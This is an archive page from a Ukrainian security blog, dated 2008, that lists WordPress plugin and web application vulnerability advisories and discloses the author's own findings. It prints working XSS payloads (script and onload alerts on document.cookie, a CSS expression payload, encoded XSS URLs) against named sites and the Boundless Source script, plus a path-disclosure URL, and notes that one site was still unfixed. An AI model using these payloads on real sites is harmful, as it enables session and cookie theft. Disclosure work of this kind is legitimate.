Архів для категорії 'Уразливості'

Уразливості в плагінах для WordPress №6

23:54 30.01.2008

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах fGallery, WP-Cal та Adserve. Для котрих нещодавно з’явилися експлоіти. fGallery - це плагін для створення галереї зображень, WP-Cal - це плагін для створення календаря, а Adserve - це плагін для керування рекламою на сайті.

  • Wordpress plugin fGallery 2.4.1 fimrss.php SQL Injection Vulnerability (деталі)
  • Wordpress Plugin WP-Cal 0.3 editevent.php SQL Injection Vulnerability (деталі)
  • Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості на zakladka.org.ua

19:41 30.01.2008

26.02.2007

Ще в вересні, 29.09.2006 (трохи відклалося з цим анонсом), я знайшов Cross-Site Scripting та Full path disclosure уразливості на популярному проекті http://zakladka.org.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

30.01.2008

XSS:

POST запит на сторінці http://zakladka.org.ua/add.html

<script>alert(document.cookie)<script>В полі: Подай URL сторінки.

Full path disclosure:

Такий самий POST запит на сторінці http://zakladka.org.ua/add.html.

Дані уразливості вже виправлені. Але XSS дірка виправлена не повністю і при невеликій модифікації знову працює.

XSS:

POST запит на сторінці http://zakladka.org.ua/add.html (для IE)

" style="xss:expression(alert(document.cookie))В полі: Подай URL сторінки.

Добірка уразливостей

16:23 29.01.2008

В даній добірці уразливості в веб додатках:

  • Vulnerability in getID3 in the Mediafield and Audio modules for Drupal (деталі)
  • Vulnerability in the Secure site module for Drupal (деталі)
  • Firebird process_packet() Remote Stack Overflow Vulnerability (деталі)
  • SquirrelMail G/PGP Plugin gpg_recv_key() Command Injection Vulnerability (деталі)
  • SquirrelMail G/PGP Plugin deleteKey() Command Injection Vulnerability (деталі)
  • SendStudio <= 2004.14 Remote File Inclusion Vulnerability (деталі)
  • SaphpLesson v3.0 SQL Injection Exploit (деталі)
  • Уразливість при обробці RETR кодманд в Star FTP Server (деталі)
  • Vulnerability in CarbonCommunities (деталі)
  • PHP-інклюдинг в MxBB Portal mx_charts (деталі)
  • Уразливість при обробці вхідних даних в SQL-Ledger (деталі)
  • Directory traversal vulnerability in VerliAdmin (деталі)
  • New elog packages fix arbitrary code execution (деталі)
  • Декілька уразливостей в ScriptMate User Manager (деталі)
  • mono-web ASP.net sourcecode disclosure (деталі)

Уразливості на www.opennet.ru

19:16 28.01.2008

03.09.2007

У лютому, 23.02.2007, я знайшов Cross-Site Scripting уразливість на проекті www.opennet.ru (який в тому числі публікує новини безпеки). А сьогодні я знайшов ще дві XSS уразливості. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.01.2008

XSS:

Дані уразливості вже виправлені. До речі, в листопаді я писав про уразливість в капчі - opennet.ru CAPTCHA bypass.

Добірка уразливостей

16:33 27.01.2008

В даній добірці уразливості в веб додатках:

  • SQL injection vulnerability in webSPELL 4.01.02 (деталі)
  • Directory traversal flaw in shttp (деталі)
  • AdMentor Script Remote SQL injection Exploit (деталі)
  • phpXmms 1.0 (tcmdp) Remote File Include Vulnerabilities (деталі)
  • SQL injection vulnerability in Francisco Burzi PHP-Nuke 8.0 (деталі)
  • Vulnerability in phpMyFAQ (деталі)
  • Cross-site scripting vulnerability in the Barry Jaspan Image Pager module for Drupal (деталі)
  • Vulnerability in newsCMSlite (деталі)
  • SQL injection vulnerability in E-SMARTCART 1.0 (деталі)
  • Розкриття ідентифікаторів сесій користувачів в Drupal Chatroom (деталі)
  • Переповнення буфера в ProFTPD (деталі)
  • SQL injection vulnerability in Simple Web Content Management System (деталі)
  • Уразливість при обробці команди LIST в Crob FTP Server (деталі)
  • Vulnerability in Sven Moderow GuestBook 0.3a (деталі)
  • Обхід механізму захисту від XSS в Adobe ColdFusion MX (деталі)

Cross-Site Scripting уразливості в Boundless Source

23:52 26.01.2008

У листопаді, 29.11.2007, я знайшов Cross-Site Scripting уразливості у веб додатку Boundless Source (скрипт каталогу).

XSS:

http://site/catalog/index.cgi?search=%3Cscript%3Ealert(document.cookie)%3C/script%3E&sparam=all&category=cat20

http://site/catalog/add-lnk.cgi?cmd=sendpassword&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/catalog/add-lnk.cgi?cmd=edit&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/catalog/admin.cgi?cmd=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (Persistent):

POST запит на сторінці http://site/catalog/add-lnk.cgi?cmd=showform

<BODY onload=alert(document.cookie)В полях: Название ресурса, URL, Регион, Описание сайта.

Вразливі версії Boundless Source 1.2.1 (безкоштовна) і 2.4 (комерційна) та попередні версії. Про уразливості розробникам веб додатка я повідомлю найближчим часом.

Уразливість на web.meta.ua

20:27 26.01.2008

27.08.2007

У лютому, 23.02.2007, я знайшов Cross-Site Scripting уразливість на проекті http://web.meta.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно проектів компанії Мета я писав про уразливості на bg.meta.ua.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.01.2008

XSS:

Дана уразливість вже виправлена.

Уразливості в плагінах для WordPress №5

23:50 25.01.2008

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Wp-FileManager, WP-Forum та Permalinks Migration. Для котрих нещодавно з’явилися експлоіти. Wp-FileManager - це плагін файлового менеджера, WP-Forum - це плагін для створення форума, а Permalinks Migration - це плагін для переходу на використання пермалінків.

  • Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability (деталі)
  • Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability (деталі)
  • XSRF under Dean’s Permalinks Migration 1.0 (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

16:26 25.01.2008

В даній добірці уразливості в веб додатках:

  • Tor security advisory: cross-protocol http form attack (деталі)
  • Unrestricted file upload vulnerability in webSPELL (деталі)
  • SQL injection vulnerability in webSPELL (деталі)
  • smbftpd 0.96 format string vulnerability (деталі)
  • Call Center Software - Remote Xss Post Exploit (деталі)
  • Blind sql injection attack in INSERT syntax on PHP-nuke <=8.0 Final (деталі)
  • Nabopoll Blind SQL Injection vulnerabilies (деталі)
  • PHP-інклюдинг в MxBB Portal Knowledge Base/mx_kb (деталі)
  • PHP-інклюдинг в MxBB Portal mx_modsdb (деталі)
  • Directory traversal vulnerability in Formbankserver 1.9 (деталі)
  • Multiple cross-site scripting vulnerabilities in AShop Deluxe 4.5 and AShop Administration Panel (деталі)
  • Vulnerability in jgbbs (деталі)
  • Уразливість при обробці стандартних полів в Mantis (деталі)
  • Численні уразливості в WAWI (деталі)
  • Vulnerability in WineGlass (деталі)

Уразливість на expert.com.ua

19:31 24.01.2008

28.02.2007

Нещодавно, 23.02.2007, я знайшов Cross-Site Scripting уразливість на проекті http://expert.com.ua (Інтернет ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Тоді я як раз зайшов почитати новину Intel продемонстрировала в Киеве, как нужно защищать компьютеры, стосовно конференції IDC IT Security Roadshow 2007, котра як раз на днях проходила в Києві. І про сайт компаніїї IDC, що проводила дану конференцію, я згадув учора стосовно уразливості на idc-cema.com.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

24.01.2008

XSS:

Сьогодні я також виявив Full path disclosure уразливість, коли перевіряв дану XSS. Також в листопаді я писав про уразливість в капчі - expert.com.ua CAPTCHA bypass.

Full path disclosure:

http://expert.com.ua/index.php?option=news3-1478′

Дані уразливості досі не виправлені.